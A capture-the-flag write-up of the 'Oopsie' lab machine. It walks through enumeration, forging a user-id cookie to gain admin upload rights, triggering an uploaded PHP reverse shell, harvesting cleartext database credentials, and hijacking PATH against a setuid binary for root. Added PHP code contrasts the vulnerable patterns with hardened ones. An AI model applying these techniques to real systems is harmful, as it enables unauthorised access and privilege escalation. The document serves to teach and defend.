# Oopsie

## Enumeration

A first nmap scan reveals some open ports:

`sudo nmap -sC <IP>`

```
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
```

On the web server the directory `/cdn-cgi` was listable; I found the directory itself by fuzzing for it with ffuf. Inside it I found `/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js`, which contained some credentials:

```
admin
MEGACORP_4dm1n!!
34322	admin	admin@megacorp.com
8832	john	john@tafcz.co.uk
86575	super admin	superadmin@megacorp.com
```

## Web Access and Insecure Cookie Abuse

Logging in at the web server at `http://<TARGETIP>/cdn-cgi/login` with the credentials I found, there was a file upload feature that seemed to require the higher permissions of some "super admin" account.

Since the page was PHP-based and there was no session information in the URL, I expected a session cookie. I found the cookie, but it was not a proper session ID: it was a custom string. In the publicly visible code of `/cdn-cgi/login/admin.php` I found this:

```php
// The privilege decision rests entirely on a cookie value the client controls.
if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575")
```

So I got privileged access to `http://<TARGETIP>/cdn-cgi/login/admin.php?content=uploads&action=upload` by loading that page with the cookie set to "34322".
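The check above is the root cause of the web-tier compromise: the server trusts a user id that the browser itself supplies. As an added example (not code from the Oopsie box), the following PHP contrasts that check with a session-based one, where the only thing the client holds is an opaque session id and the role is looked up server-side. The user table, the password values and the mapping of the `super_admin` role to the upload right are constructed for illustration.

```php
<?php
declare(strict_types=1);

// --- Vulnerable pattern (the shape of the check seen in admin.php) ---
// The browser sets $_COOKIE["user"]; the server treats it as proof of identity,
// so editing the cookie to 86575 is all it takes to become "super admin".
function isSuperAdminByCookie(array $cookie): bool
{
    return isset($cookie['user'])
        && ($cookie['user'] === '34322' || $cookie['user'] === '86575');
}

// --- Hardened pattern ---
// Identity and role live in $_SESSION after a password check. The cookie the
// client holds is only the random PHPSESSID, which maps to server-side state and
// cannot be edited into another user's id or role.

// Constructed stand-in for the users table; hashes are generated at runtime.
function userTable(): array
{
    static $users = null;
    if ($users === null) {
        $users = [
            'admin'      => ['id' => 34322, 'role' => 'admin',
                             'hash' => password_hash('example-admin-pw', PASSWORD_DEFAULT)],
            'superadmin' => ['id' => 86575, 'role' => 'super_admin',
                             'hash' => password_hash('example-super-pw', PASSWORD_DEFAULT)],
        ];
    }
    return $users;
}

// Verify the password, rotate the session id, and record identity server-side.
// $session stands in for $_SESSION so the function can be exercised from the CLI.
function login(string $username, string $password, array &$session): bool
{
    $users = userTable();
    if (!isset($users[$username]) || !password_verify($password, $users[$username]['hash'])) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);   // new id on privilege change: blocks session fixation
    }
    $session['user_id'] = $users[$username]['id'];
    $session['role']    = $users[$username]['role'];
    return true;
}

// Authorisation for the upload feature reads the role from the session only;
// nothing the client sends is consulted.
function canUpload(array $session): bool
{
    return ($session['role'] ?? '') === 'super_admin';
}

// Flags for the real session cookie: HttpOnly keeps it away from scripts,
// Secure restricts it to HTTPS, SameSite limits cross-site sending.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
}

if (PHP_SAPI === 'cli') {
    $forged = ['user' => '86575'];               // constructed forged cookie
    echo 'vulnerable check with forged cookie: '
        . (isSuperAdminByCookie($forged) ? "super admin\n" : "denied\n");

    $session = [];
    login('admin', 'example-admin-pw', $session);
    echo 'hardened check as admin: ' . (canUpload($session) ? "allowed\n" : "denied\n");

    $session = [];
    login('superadmin', 'example-super-pw', $session);
    echo 'hardened check as superadmin: ' . (canUpload($session) ? "allowed\n" : "denied\n");

    // The forged cookie has no effect on canUpload(): it never reads $_COOKIE.
    $session = [];
    echo 'hardened check with forged cookie only: '
        . (canUpload($session) ? "allowed\n" : "denied\n");
}
```

Run with `php example.php`. The design point is that a user id or role must never travel in a value the client can rewrite; the cookie should carry only a random identifier, and everything that decides privilege is resolved on the server from that identifier.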

## Shell Access and Pillaging

At the upload page I could upload a PHP reverse shell and activate it with curl:

```bash
curl http://10.10.10.28/uploads/php-reverse-shell.php
```

The shell was as the user www-data. Running `cat /var/www/html/cdn-cgi/login/db.php` yielded the following credentials:

```php
// Connection line from db.php: the database password is stored in cleartext.
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
```

With those credentials I could establish an SSH connection as the user robert.

## Insecure Relative Path

Checking the groups of the user, I saw that robert was a member of the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple `strings bugtracker` showed me this:

```
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"
```

I created the file /home/robert/soos/cat, a script that starts /bin/bash. Then I prepended that directory to the PATH, so that my version of cat is used whenever cat is called without an absolute path:

```bash
export PATH=/home/robert/soos:$PATH
```

Executing the bugtracker binary now, I could start a root shell.
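The strings output shows the binary running `cat /root/reports/<id>` with a bare `cat`, so whichever `cat` the caller's PATH resolves first runs with root privileges. As an added example, not the bugtracker's source (which is a native binary), here is the same report lookup written in PHP in a weak form and two hardened forms: no shell at all, and, where an external program is unavoidable, an absolute program path with an explicitly chosen environment. The reports directory comes from the strings output; the numeric bug-id format is an assumption.

```php
<?php
declare(strict_types=1);

const REPORTS_DIR = '/root/reports';   // path shown by strings on the page

// Weak pattern: relative command name, PATH inherited from the caller, and the
// id concatenated unchecked. Both the program that runs and the argument are
// under the caller's control.
function showReportWeak(string $id): string
{
    return (string) shell_exec('cat ' . REPORTS_DIR . '/' . $id);
}

// Assumption: bug ids are short, purely numeric strings.
function isValidBugId(string $id): bool
{
    return preg_match('/^[0-9]{1,10}$/', $id) === 1;
}

// Hardened form 1: no shell. Validate the id, resolve the path, make sure it
// stays inside the reports directory, and read the file directly.
function showReportSafe(string $id, string $dir = REPORTS_DIR): ?string
{
    if (!isValidBugId($id)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $id);
    if ($base === false || $path === false || strpos($path, rtrim($base, '/') . '/') !== 0) {
        return null;                    // missing file, or outside the reports dir
    }
    $content = file_get_contents($path);
    return $content === false ? null : $content;
}

// Hardened form 2: if an external program must run, exec it by absolute path
// (PATH is never consulted), without /bin/sh in between, and with a minimal,
// known environment instead of whatever the caller exported.
function showReportFixedPath(string $id, string $dir = REPORTS_DIR): ?string
{
    if (!isValidBugId($id)) {
        return null;
    }
    $cmd  = ['/bin/cat', $dir . '/' . $id];   // array form (PHP 7.4+): direct exec, no shell
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes, null, ['PATH' => '/usr/bin:/bin']);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc) === 0 ? $out : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed stand-in for /root/reports so the example runs unprivileged.
    $dir = sys_get_temp_dir() . '/reports-example-' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/1', "Bug 1: constructed example report\n");

    var_dump(showReportSafe('1', $dir));               // the report text
    var_dump(showReportSafe('../etc/passwd', $dir));   // NULL: rejected by the id check
    var_dump(showReportFixedPath('1', $dir));          // the report text via /bin/cat

    unlink($dir . '/1');
    rmdir($dir);
}
```

The same rules apply to a setuid C binary: call programs by absolute path or set PATH to a fixed value before `system()`/`execvp()`, validate the input that becomes part of the command, and prefer reading the file directly over shelling out. On the detection side, a privileged helper that resolves commands through the caller's PATH shows up in `strings` output exactly as it did here: a bare command name followed by a fixed directory.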
